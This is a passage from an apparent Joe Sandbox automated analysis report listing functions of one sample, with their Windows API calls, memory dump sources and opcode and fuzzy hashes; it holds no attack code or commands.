                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1203560049-0
                                                                                          • Opcode ID: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
                                                                                          • Instruction ID: da5962f2c9b93320619ff5bee9702d249cad542652ab9e3699a6041f9535fdce
                                                                                          • Opcode Fuzzy Hash: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
                                                                                          • Instruction Fuzzy Hash: 2021C823A1CB8681FE608F25E4552697361FF88B94F105230EE9D867A5DF3CD540D704
                                                                                          Function 00007FF6373A31BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3118131910-0
                                                                                          • Opcode ID: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                                                                                          • Instruction ID: 7db8754afaca4b65f9c829e3acb22bbb25655b340cfbc971657a82a8c96587c4
                                                                                          • Opcode Fuzzy Hash: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                                                                                          • Instruction Fuzzy Hash: 6C21B362A1CB8681FE508B25F44526E63A0FF89B94F505230EE9E82BA9DF3CE540D740
                                                                                          Function 00007FF6373A32BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1203560049-0
                                                                                          • Opcode ID: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                                                                                          • Instruction ID: 9f101ffac4810a6b5bdae9212f1516ec7dc22b48006689f644c22e5ff4c61745
                                                                                          • Opcode Fuzzy Hash: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                                                                                          • Instruction Fuzzy Hash: 5E217172A1CB8182FE508B29F4452696361FBC9BA4F500231EE9D83BE5DF3DE540DB05
                                                                                          Function 00007FF6373CBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                          • Instruction ID: 7a8e1edb156f98e3abd4b5ea8b21ff2373e9eab3fc0c192d9d5c993337f4ce11
                                                                                          • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                          • Instruction Fuzzy Hash: CAE04F28F0C31786FB546B3198953B92356AF88743F104438C80E833A6CE3DF409AB11
                                                                                          Function 00007FF63739F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF63739F895
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF63739F89B
                                                                                            • Part of subcall function 00007FF6373A3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6373B0811), ref: 00007FF6373A3EFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 3587649625-0
                                                                                          • Opcode ID: 0727ec51174826d68c84487d173ba676bd8552af031965f13571e1e86759052a
                                                                                          • Instruction ID: 843965470806330ad2a389f84ec11244ab49b44f98d7244a0ed64aee78e00db0
                                                                                          • Opcode Fuzzy Hash: 0727ec51174826d68c84487d173ba676bd8552af031965f13571e1e86759052a
                                                                                          • Instruction Fuzzy Hash: 3691BC73A1CB82D0FB10DB24D8842AD6361FB96798F904136EA5C87BE9DF78D585D300
                                                                                          Function 00007FF637393904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
                                                                                          • Instruction ID: faf01ad327d6039ab9b42b8e708150f0de57340b35e16ba058575a9b6b190e3c
                                                                                          • Opcode Fuzzy Hash: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
                                                                                          • Instruction Fuzzy Hash: B941AEA2F1D65284FB00DBB5D4407ED2321AF5AB98F145235EE1DA7B9ADE38E4829301
                                                                                          Function 00007FF6373A2778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6373A274D), ref: 00007FF6373A28A9
                                                                                          • GetLastError.KERNEL32(?,00007FF6373A274D), ref: 00007FF6373A28B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                          • Instruction ID: 46a2222c5fd9e500a7eccd5433b09cae5093b79e614def2c1132677c5c37b372
                                                                                          • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                          • Instruction Fuzzy Hash: D031E932B1DA5682FEA04B2AD9416B92395EF84BD4F140131EE1DC7BA4DF3CE991B740
                                                                                          Function 00007FF6373922BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1746051919-0
                                                                                          • Opcode ID: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                                                                                          • Instruction ID: ac279c3ffa445baabef7129fbeb920a6be4481f22b99f95c1546321387c79c49
                                                                                          • Opcode Fuzzy Hash: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                                                                                          • Instruction Fuzzy Hash: E531E022A1DB8682FA509B25F4843AEB361EF95B90F444235EB9C87BA5DF3CF4409704
                                                                                          Function 00007FF6373A2AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$BuffersFlushTime
                                                                                          • String ID:
                                                                                          • API String ID: 1392018926-0
                                                                                          • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                          • Instruction ID: aaa5e150c5e480a0f17706fb4b238ee06fd5b1f8f4cceb8ba8bfa2908ced7c56
                                                                                          • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                          • Instruction Fuzzy Hash: 6E21F122F0EB4296FEA68F11D4027BA5790EF89794F554031DE4C423A1EE3CE4A6E300
                                                                                          Function 00007FF6373C2C80 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                          • String ID:
                                                                                          • API String ID: 3548387204-0
                                                                                          • Opcode ID: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                                                                                          • Instruction ID: 37474b52583565599481812fc2028672e7e228ee2954d99960f0fe2c5e9a809a
                                                                                          • Opcode Fuzzy Hash: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                                                                                          • Instruction Fuzzy Hash: 0911EE22E1C27741FA9573B048962FE11815FAA347F400474E96DCA3E3EE3CB855B263
                                                                                          Function 00007FF6373AAAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString
                                                                                          • String ID:
                                                                                          • API String ID: 2948472770-0
                                                                                          • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                          • Instruction ID: aa72f4990284cf63d3f72649d162b2fdb93797bb6355780d894ab8748b0d5a44
                                                                                          • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                          • Instruction Fuzzy Hash: 57115871B0DB4586FA408F1AA880169BBE1BB88FC0F544439CA0DE3720EE7CE551A784
                                                                                          Function 00007FF6373A2BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                          • Instruction ID: 167c824f9d2542663d83ce60340ae7dbac53d122bf7622b0a2f3e3b1dffedb6b
                                                                                          • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                          • Instruction Fuzzy Hash: 24118421A1C64181FFA08B25E8816796360FB95BB4F544331DA7D963E4DF3CE5A6E700
                                                                                          Function 00007FF63739255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemRectTextWindow$Clientswprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3322643685-0
                                                                                          • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                          • Instruction ID: 66f929b340189d20874a4b91b7bd5ee20cf56709b6301f432209f7741b5aab16
                                                                                          • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                          • Instruction Fuzzy Hash: D0014461E0E78A51FF995752A4593B99791AF96784F084035D84D863E9EE3CF884E300
                                                                                          Function 00007FF6373AEB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6373AEBAD,?,?,?,?,00007FF6373A5752,?,?,?,00007FF6373A56DE), ref: 00007FF6373AEB5C
                                                                                          • GetProcessAffinityMask.KERNEL32 ref: 00007FF6373AEB6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                          • String ID:
                                                                                          • API String ID: 1231390398-0
                                                                                          • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                          • Instruction ID: 4d8f4b1742354e9b5e4d5b6206bb9bb320a956f9e0d8ddc6186a6500f450368f
                                                                                          • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                          • Instruction Fuzzy Hash: 18E0E561F1C64642EF488B55C4465E96392FF88B40F848135D60BC3714DE3CE1498B00
                                                                                          Function 00007FF6373C21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 1173176844-0
                                                                                          • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                          • Instruction ID: d40787c3d3cd54c3b69e26c661b0ef488e836c49f240e8777dd1929eb28bc409
                                                                                          • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                          • Instruction Fuzzy Hash: 85E01740E0E22F41FD6823761C2A1B400944F2A772E1C1B30DE3EC83E3EE3CA5A2B110
                                                                                          Function 00007FF6373CD90C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                          • Instruction ID: 96b2690b7e9b8b4512b3a72620b022380e3b51909c95485c28d4b6cf303df5fb
                                                                                          • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                          • Instruction Fuzzy Hash: A6E0EC64E1D61346FF18ABB298451B862D19F94B56F044434E90DD6362EF3CA495A604
                                                                                          Function 00007FF6373933E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
